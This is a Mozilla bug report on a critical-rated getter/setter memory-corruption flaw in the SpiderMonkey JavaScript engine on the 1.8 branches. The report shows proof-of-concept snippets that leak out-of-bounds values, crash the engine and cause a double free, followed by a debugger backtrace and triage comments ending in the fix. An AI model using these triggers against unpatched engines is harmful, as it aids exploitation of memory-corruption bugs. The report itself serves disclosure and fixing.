Closed
Bug 367501
Opened 18 years ago
Closed 18 years ago
getter/setter issue is not yet fixed on branches
Categories
(Core :: JavaScript Engine, defect)
Tracking
()
VERIFIED
FIXED
People
(Reporter: moz_bug_r_a4, Unassigned)
References
Details
(Keywords: verified1.8.0.10, verified1.8.1.2, Whiteboard: [sg:critical] fix in bug 366292)
Attachments
(5 files)
The patch in bug 366396 is not sufficient to fix this on branches. CACHED_GET, CACHED_SET, NATIVE_GET, NATIVE_SET are related. And, this could be potentially exploitable. --- var a = { set x() {} }; a.x; A resulting value is 2 (obj->slots[-1] == 5). --- var a = { set x() {} }; for (var i = 0; i < 92169 - 3; ++i) a[i] = 1; a.x; a.x; A resulting value is 46084 (obj->slots[-1] == 92169). --- var a = { set x() {} }; for (var i = 0; i < 0x4bf20 - 3; ++i) a[i] = 1; a.x; a.x.x; Crash (obj->slots[-1] == 0x4bf20). --- var a = { set x() {} }; for (var i = 0; i < 0x10050c - 3; ++i) a[i] = 1; a.x; typeof a.x; A resulting value is "string" (obj->slots[-1] == 0x10050c). --- var a = { get y() {} }; a.y = 10; for (var i = 0; i < 3; ++i) a[i] = 1; *** glibc detected *** double free or corruption (out): 0x08a42d90 *** #0 0xffffe410 in __kernel_vsyscall () #1 0xb74d19a1 in raise () from /lib/tls/i686/cmov/libc.so.6 #2 0xb74d32b9 in abort () from /lib/tls/i686/cmov/libc.so.6 #3 0xb750587a in __fsetlocking () from /lib/tls/i686/cmov/libc.so.6 #4 0xb750bfd4 in malloc_usable_size () from /lib/tls/i686/cmov/libc.so.6 #5 0xb750c34a in free () from /lib/tls/i686/cmov/libc.so.6 #6 0xb7e6fe75 in JS_free (cx=0x885a1f0, p=0x8a42d90) at jsapi.c:1690 #7 0xb7ee9436 in AllocSlots (cx=0x885a1f0, slots=0x8a42d94, nslots=8) at jsobj.c:2280 #8 0xb7eeb140 in js_AllocSlot (cx=0x885a1f0, obj=0x8a80b30, slotp=0xbfa80e04) at jsobj.c:2733 #9 0xb7f26a7c in js_AddScopeProperty (cx=0x885a1f0, scope=0x8a29d38, id=5, getter=0, setter=0, slot=4294967295, attrs=1, flags=0, shortid=0) at jsscope.c:1134 #10 0xb7eee70a in js_SetProperty (cx=0x885a1f0, obj=0x8a80b30, id=5, vp=0xbfa815f0) at jsobj.c:3699 #11 0xb7eca7e2 in js_Interpret (cx=0x885a1f0, pc=0x88017ad "8\002)", result=0xbfa81990) at jsinterp.c:3737 #12 0xb7eb94f5 in js_Execute (cx=0x885a1f0, chain=0x8a80b48, script=0x8801740, down=0x81baff8, flags=32, result=0xbfa81b70) at jsinterp.c:1654 #13 0xb7ee5e07 in obj_eval (cx=0x885a1f0, obj=0x8a94418, argc=1, argv=0x81bb078, rval=0xbfa81b70) at jsobj.c:1360 #14 0xb7eb8927 in js_Invoke (cx=0x885a1f0, argc=1, flags=0) at jsinterp.c:1396 ---Type <return> to continue, or q <return> to quit---
|
Reporter | |
Comment 1•18 years ago
|
||
SeaMonkey 1.1 has been released with this bug. Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070111 SeaMonkey/1.1
|
||
Comment 2•18 years ago
|
||
Bug 366292 was never checked into the 1.8 branch...
|
||
Comment 3•18 years ago
|
||
Is this a duplicate of bug 366292 then, or is that just a prerequisite to fixing this?
|
|
||
Comment 4•18 years ago
|
||
(In reply to comment #1) > SeaMonkey 1.1 has been released with this bug. The seamonkey team decided to release the much delayed 1.1 now rather than wait for 1.8.1.2 and plan to catch up with a subsequent security update.
Flags: blocking1.8.1.2?
|
|
||
Updated•18 years ago
|
Flags: blocking1.8.1.2?
Flags: blocking1.8.1.2+
Flags: blocking1.8.0.10+
Whiteboard: [sg:critical] fix in bug 366292
|
||
Comment 5•18 years ago
|
||
brendan: Is this a dup of bug 366292? If so, we need to mark it so and remove the blocking flags (since we already approved and landed the fixes in that other bug). Let us know... thanks!
|
|
Reporter | |
Comment 6•18 years ago
|
||
This has been fixed in bug 366292. Tested with: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070122 BonEcho/2.0.0.2pre Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.10pre) Gecko/20070122 Firefox/1.5.0.10pre
|
|
||
Updated•18 years ago
|
Status: NEW → RESOLVED
Closed: 18 years ago
Keywords: fixed1.8.0.10,
fixed1.8.1.2
Resolution: --- → FIXED
|
||
Comment 7•18 years ago
|
||
|
|
||
Comment 8•18 years ago
|
||
|
|
||
Comment 9•18 years ago
|
||
|
|
||
Comment 10•18 years ago
|
||
|
|
||
Updated•18 years ago
|
Flags: in-testsuite+
|
|
||
Comment 12•17 years ago
|
||
verified fixed 2007-02-17 1.9.0 windows/mac*/linux
Status: RESOLVED → VERIFIED
|
|
||
Updated•17 years ago
|
Group: security
|
|
||
Comment 13•17 years ago
|
||
/cvsroot/mozilla/js/tests/js1_5/extensions/regress-367501-01.js,v <-- regress-367501-01.js initial revision: 1.1 /cvsroot/mozilla/js/tests/js1_5/extensions/regress-367501-02.js,v <-- regress-367501-02.js initial revision: 1.1 /cvsroot/mozilla/js/tests/js1_5/extensions/regress-367501-03.js,v <-- regress-367501-03.js initial revision: 1.1 /cvsroot/mozilla/js/tests/js1_5/extensions/regress-367501-04.js,v <-- regress-367501-04.js initial revision: 1.1
You need to log in
before you can comment on or make changes to this bug.
Description
•